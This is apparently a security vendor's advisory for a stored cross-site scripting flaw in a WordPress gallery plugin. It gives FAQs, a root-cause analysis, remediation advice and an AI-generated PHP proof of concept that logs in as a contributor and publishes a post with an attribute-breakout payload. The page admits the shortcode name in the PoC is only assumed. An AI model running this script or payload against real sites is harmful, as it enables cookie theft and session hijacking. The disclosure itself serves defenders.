How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping for the ‘data-image-title’ parameter. An authenticated attacker can inject malicious scripts into the content, which are then executed when other users view the affected page.

Who is affected by this vulnerability?

Any WordPress site using the Tiled Gallery Carousel Without JetPack plugin version 3.1 or earlier is at risk. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Tiled Gallery Carousel Without JetPack plugin installed on your WordPress site. If it is version 3.1 or earlier, your site is at risk.

What should I do to fix this vulnerability?

Currently, there is no patched version available for the plugin. Site administrators should disable or remove the plugin and review any content created by contributors for potential malicious scripts until a fix is released.

What does the CVSS score of 5.4 mean?

The CVSS score of 5.4 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk. Successful exploitation could lead to various attacks, including cookie theft and session hijacking.

How does the proof of concept demonstrate the issue?

The proof of concept provided illustrates how an attacker can authenticate as a contributor and inject a malicious script into the ‘data-image-title’ parameter. This script would execute when other users view the affected page, showcasing the vulnerability’s impact.

What are the consequences of a successful attack?

Successful exploitation can lead to cookie theft, session hijacking, or even privilege escalation if an attacker targets administrators. The attack could compromise the integrity of the site and affect all users who visit the affected pages.

How can I protect my site in the meantime?

In addition to disabling the vulnerable plugin, regularly review and sanitize user-generated content. Implement security measures such as web application firewalls and keep all other plugins and WordPress itself updated to reduce the attack surface.

What should I do if I suspect exploitation?

If you suspect that your site has been exploited, immediately disable the plugin, review recent changes made by contributors, and check for any unauthorized scripts or changes. Consider restoring from a backup if necessary and conduct a full security audit.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 2, 2026

CVE-2026-5191: Tiled Gallery Carousel Without JetPack <= 3.1 Authenticated (Contributor+) Stored Cross-Site Scripting via 'data-image-title' PoC, Patch Analysis & Rule

Q: What is CVE-2026-5191?

CVE-2026-5191 is a stored cross-site scripting (XSS) vulnerability found in the Tiled Gallery Carousel Without JetPack plugin for WordPress, affecting versions up to and including 3.1. It allows authenticated users with contributor-level access or higher to inject arbitrary scripts via the ‘data-image-title’ parameter.

Q: What are the practical implications of this vulnerability?

If exploited, this vulnerability allows attackers to execute arbitrary JavaScript in the context of any user viewing the compromised page. This can lead to serious security issues, including data theft and unauthorized actions on behalf of users.

CVE ID CVE-2026-5191

Plugin tiled-gallery-carousel-without-jetpack

Severity Medium (CVSS 5.4)

CWE 79

Vulnerable Version 3.1

Patched Version —

Disclosed May 31, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5191 (metadata-based): This vulnerability is a stored cross-site scripting (XSS) issue in the Tiled Gallery Carousel Without JetPack plugin for WordPress, affecting versions up to and including 3.1. It allows authenticated users with contributor-level access or higher to inject arbitrary web scripts via the ‘data-image-title’ parameter. The CVSS score is 5.4 (Medium), with a vector indicating low attack complexity, low privileges required, user interaction required, and partial impacts to confidentiality and integrity.

Root Cause: Based on the CWE classification (79) and the description, the plugin fails to properly sanitize input and escape output for the ‘data-image-title’ parameter when processing gallery carousel shortcodes or blocks. This parameter likely allows HTML attribute injection, enabling attackers to break out of the attribute context and inject malicious script tags. Atomic Edge analysis infers that the plugin uses functions like the_title() or esc_attr() incorrectly, or omits them entirely for this parameter. This conclusion is inferred from the CWE and description, as no code diff is available.

Exploitation: An attacker with contributor-level access creates a new post or page, or edits an existing one, and inserts the plugin’s gallery carousel shortcode. In the shortcode’s ‘data-image-title’ attribute, the attacker injects a payload such as: ‘” onmouseover=”alert(document.cookie)” data-x=”‘. When a user views the page, the injected script executes, for example, stealing cookies or performing actions on behalf of the victim. The attack leverages the WordPress shortcode interface or block editor, which does not restrict HTML attribute injection. No AJAX endpoint is involved; the payload is stored in the post content and rendered on page load.

Remediation: The fix requires implementing proper input sanitization and output escaping. The plugin should use WordPress’s built-in functions such as sanitize_text_field() for the attribute value and esc_attr() when outputting it in the HTML. Developers should treat all user-supplied inputs, even those from authenticated users, as untrusted. Since no patched version is available, site administrators should disable the plugin or remove it, and review any content created by contributors for malicious scripts.

Impact: Successful exploitation allows an authenticated contributor or higher to execute arbitrary JavaScript in the context of any user viewing the compromised page. This can lead to cookie theft, session hijacking, defacement, or phishing attacks. The attacker can target administrators to perform privilege escalation, potentially gaining full site control. The impact is limited to stored XSS within the WordPress site, but the reach includes all visitors, making it a significant risk for multi-user sites.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-5191 - Tiled Gallery Carousel Without JetPack <= 3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'data-image-title'

// Configuration
$target_url = 'http://example.com'; // Replace with target WordPress URL
$username = 'contributor';
$password = 'password';

// Step 1: Authenticate
$login_url = $target_url . '/wp-login.php';
$post_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
if (curl_errno($ch)) {
    die('Login failed: ' . curl_error($ch));
}
curl_close($ch);
echo "Authentication successful.n";

// Step 2: Get the new post page to get the _wpnonce
$new_post_url = $target_url . '/wp-admin/post-new.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $new_post_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);
curl_close($ch);

// Extract _wpnonce
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $response, $matches);
if (!isset($matches[1])) {
    die('Could not get nonce.');
}
$nonce = $matches[1];
echo "Nonce obtained: $noncen";

// Step 3: Create a new post with malicious shortcode
$post_title = 'Test Post XSS';
// XSS payload in data-image-title attribute - breaks out of attribute context and injects script
$payload = '" onmouseover="alert(document.cookie)" data-x="';
// The shortcode name is assumed based on the plugin slug; the exact shortcode may vary.
// The 'data-image-title' parameter is passed inside the shortcode.
$post_content = '[tiled-gallery-carousel images="1" data-image-title="' . $payload . '"][/tiled-gallery-carousel]';

$post_data = array(
    '_wpnonce' => $nonce,
    'post_type' => 'post',
    'title' => $post_title,
    'content' => $post_content,
    'publish' => 'Publish'
);

$post_url = $target_url . '/wp-admin/post.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);
if (curl_errno($ch)) {
    die('Post creation failed: ' . curl_error($ch));
}
curl_close($ch);

echo "Post created with XSS payload.n";
echo "Visit the published post to trigger the XSS (move mouse over image).n";
?>

Frequently Asked Questions

What is CVE-2026-5191?
Understanding the vulnerability
CVE-2026-5191 is a stored cross-site scripting (XSS) vulnerability found in the Tiled Gallery Carousel Without JetPack plugin for WordPress, affecting versions up to and including 3.1. It allows authenticated users with contributor-level access or higher to inject arbitrary scripts via the ‘data-image-title’ parameter.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping for the ‘data-image-title’ parameter. An authenticated attacker can inject malicious scripts into the content, which are then executed when other users view the affected page.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Tiled Gallery Carousel Without JetPack plugin version 3.1 or earlier is at risk. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, check the version of the Tiled Gallery Carousel Without JetPack plugin installed on your WordPress site. If it is version 3.1 or earlier, your site is at risk.
What should I do to fix this vulnerability?
Remediation steps
Currently, there is no patched version available for the plugin. Site administrators should disable or remove the plugin and review any content created by contributors for potential malicious scripts until a fix is released.
What does the CVSS score of 5.4 mean?
Understanding risk levels
The CVSS score of 5.4 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk. Successful exploitation could lead to various attacks, including cookie theft and session hijacking.
What are the practical implications of this vulnerability?
Potential risks to your site
If exploited, this vulnerability allows attackers to execute arbitrary JavaScript in the context of any user viewing the compromised page. This can lead to serious security issues, including data theft and unauthorized actions on behalf of users.
How does the proof of concept demonstrate the issue?
Understanding the PoC
The proof of concept provided illustrates how an attacker can authenticate as a contributor and inject a malicious script into the ‘data-image-title’ parameter. This script would execute when other users view the affected page, showcasing the vulnerability’s impact.
What are the consequences of a successful attack?
Impact of exploitation
Successful exploitation can lead to cookie theft, session hijacking, or even privilege escalation if an attacker targets administrators. The attack could compromise the integrity of the site and affect all users who visit the affected pages.
How can I protect my site in the meantime?
Mitigation strategies
In addition to disabling the vulnerable plugin, regularly review and sanitize user-generated content. Implement security measures such as web application firewalls and keep all other plugins and WordPress itself updated to reduce the attack surface.
What should I do if I suspect exploitation?
Response to potential attacks
If you suspect that your site has been exploited, immediately disable the plugin, review recent changes made by contributors, and check for any unauthorized scripts or changes. Consider restoring from a backup if necessary and conduct a full security audit.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations